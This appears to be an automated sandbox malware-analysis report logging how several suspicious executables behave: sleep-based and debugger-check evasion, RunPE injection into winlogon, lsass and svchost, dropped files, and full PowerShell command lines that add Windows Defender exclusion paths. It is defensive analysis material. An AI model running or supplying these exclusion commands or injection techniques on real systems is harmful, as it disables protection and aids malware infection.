                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,51_2_00000001400010C0
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeMemory allocated: 1730000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeMemory allocated: 1B120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeMemory allocated: 1A6C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeMemory allocated: BD0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeMemory allocated: 1A7A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6386Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6371Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeWindow / User API: threadDelayed 7571Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeWindow / User API: threadDelayed 496Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8929
                    Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 9998
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8268
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 481
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeDropped PE file which has not been started: C:\Program Files\Cuis\bon\Bara.exeJump to dropped file
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeDropped PE file which has not been started: C:\Windows\Temp\dsarrsulkovb.sysJump to dropped file
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FA9.tmpJump to dropped file
                    Source: C:\Windows\System32\conhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                    Source: C:\Windows\System32\sc.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                    Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeAPI coverage: 7.3 %
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeAPI coverage: 7.4 %
                    Source: C:\Windows\System32\conhost.exeAPI coverage: 4.9 %
                    Source: C:\Windows\System32\sc.exeAPI coverage: 6.1 %
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeAPI coverage: 2.6 %
                    Source: C:\Windows\System32\conhost.exeAPI coverage: 4.9 %
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exe TID: 7660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep count: 6386 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 281 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 6371 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 124 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 3636Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 2836Thread sleep count: 7571 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 7348Thread sleep count: 496 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exe TID: 8048Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588Thread sleep count: 8929 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7024Thread sleep count: 81 > 30
                    Source: C:\Windows\System32\dialer.exe TID: 7632Thread sleep count: 163 > 30
                    Source: C:\Windows\System32\dialer.exe TID: 7020Thread sleep count: 161 > 30
                    Source: C:\Windows\System32\winlogon.exe TID: 7460Thread sleep count: 9998 > 30
                    Source: C:\Windows\System32\winlogon.exe TID: 7460Thread sleep time: -9998000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep count: 8268 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep count: 481 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C9B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF731C9B110
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C8407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF731C8407C
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CAFC20 FindFirstFileExA,0_2_00007FF731CAFC20
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B63116DCE0 FindFirstFileExW,2_2_000001B63116DCE0
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B88DCE0 FindFirstFileExW,10_2_1B88DCE0
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C77DCE0 FindFirstFileExW,22_2_000001C25C77DCE0
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5ACDCE0 FindFirstFileExW,63_2_0000017CD5ACDCE0
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B2D604 FindFirstFileExW,63_2_0000017CD5B2D604
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B8DCE0 FindFirstFileExW,63_2_0000017CD5B8DCE0
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F4DCE0 FindFirstFileExW,66_2_0000023E07F4DCE0
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645EEDCE0 FindFirstFileExW,68_2_000001A645EEDCE0
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA1624 VirtualQuery,GetSystemInfo,0_2_00007FF731CA1624
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: Client.exe, 0000000A.00000002.1867133794.000000001B154000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA7658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF731CA7658
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF650236CA0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,2_2_00007FF650236CA0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF650241B90 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,2_2_00007FF650241B90
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CB0CA0 GetProcessHeap,0_2_00007FF731CB0CA0
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA32D4 SetUnhandledExceptionFilter,0_2_00007FF731CA32D4
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA2490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF731CA2490
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA7658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF731CA7658
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA30F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF731CA30F0
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeCode function: 1_2_00007FF6880C118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,1_2_00007FF6880C118B
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeCode function: 1_2_00007FF6880C11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,1_2_00007FF6880C11D8
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B63116D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000001B63116D2A4
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B631167D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000001B631167D90
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF650221190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,2_2_00007FF650221190
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF650239E11 SetUnhandledExceptionFilter,2_2_00007FF650239E11
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF650480660 SetUnhandledExceptionFilter,2_2_00007FF650480660
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B88D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_1B88D2A4
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B887D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_1B887D90
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C777D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001C25C777D90
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C77D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001C25C77D2A4
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5ACD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,63_2_0000017CD5ACD2A4
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5AC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,63_2_0000017CD5AC7D90
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B2C3E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,63_2_0000017CD5B2C3E8
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B29104 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,63_2_0000017CD5B29104
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B8D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,63_2_0000017CD5B8D2A4
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B87D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,63_2_0000017CD5B87D90
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F47D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_0000023E07F47D90
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F4D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_0000023E07F4D2A4
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_00007FF62DC4118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,66_2_00007FF62DC4118B
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_00007FF62DC411D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,66_2_00007FF62DC411D8
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645EED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001A645EED2A4
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645EE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001A645EE7D90
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                    Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
                    Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
                    Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size3, 12288u, 64u)
                    Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, size, IntPtr.Zero)
                    Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAEDA0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
